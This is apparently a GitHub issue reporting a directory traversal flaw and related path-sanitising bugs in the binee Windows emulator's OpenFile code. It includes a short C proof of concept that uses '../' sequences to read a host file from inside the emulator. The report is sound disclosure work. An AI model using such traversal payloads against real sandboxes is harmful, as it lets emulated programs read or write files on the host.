You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
There exists a trivial directory traversal vulnerability, despite a previous commit attempting to fix it:
#include <Windows.h>
#include <stdio.h>
int main(int argc, char** argv)
{
HANDLE h = CreateFileA("../../../../../../../../../test", GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (h == INVALID_HANDLE_VALUE)
OutputDebugStringA("invalid handle");
char buf[128];
int nr;
int err = ReadFile(h, buf, 128, &nr, NULL);
if (err == FALSE)
OutputDebugStringA("readfile err");
OutputDebugStringA(buf);
}
Create the file /test, put something in it, and binee will fetch that content and display it in the emulation output. You may need to do some shenanigans with a manual entrypoint to get this to run under binee, due to #19. This can also be demonstrated with WriteFile.
Binee will by default open every file for reading and writing, regardless of what permissions were requested. This has a variety of implications, since the emulated program will not be able to read any files that are read only. Ironically this neuters the above vulnerability a bit, since you can only read from world-writeable/user-writeable files.
In go, strings.Replace does not modify the string in place, it returns a copy with the replacements made. Therefore the replacements with have no effect (except on line 60), since the unmodified path variable is reused.
Line 56 is buggy. This path will also be taken if the file opened merely contains the filename, for example if malware.exe tries to open malware.exe.res.
The text was updated successfully, but these errors were encountered:
There are multiple issues with the implementation of OpenFile (
binee/windows/handles.go
Line 37 in b923e31
Create the file
/test, put something in it, and binee will fetch that content and display it in the emulation output. You may need to do some shenanigans with a manual entrypoint to get this to run under binee, due to #19. This can also be demonstrated with WriteFile.Binee will by default open every file for reading and writing, regardless of what permissions were requested. This has a variety of implications, since the emulated program will not be able to read any files that are read only. Ironically this neuters the above vulnerability a bit, since you can only read from world-writeable/user-writeable files.
In go,
strings.Replacedoes not modify the string in place, it returns a copy with the replacements made. Therefore the replacements with have no effect (except on line 60), since the unmodifiedpathvariable is reused.Line 56 is buggy. This path will also be taken if the file opened merely contains the filename, for example if
malware.exetries to openmalware.exe.res.The text was updated successfully, but these errors were encountered: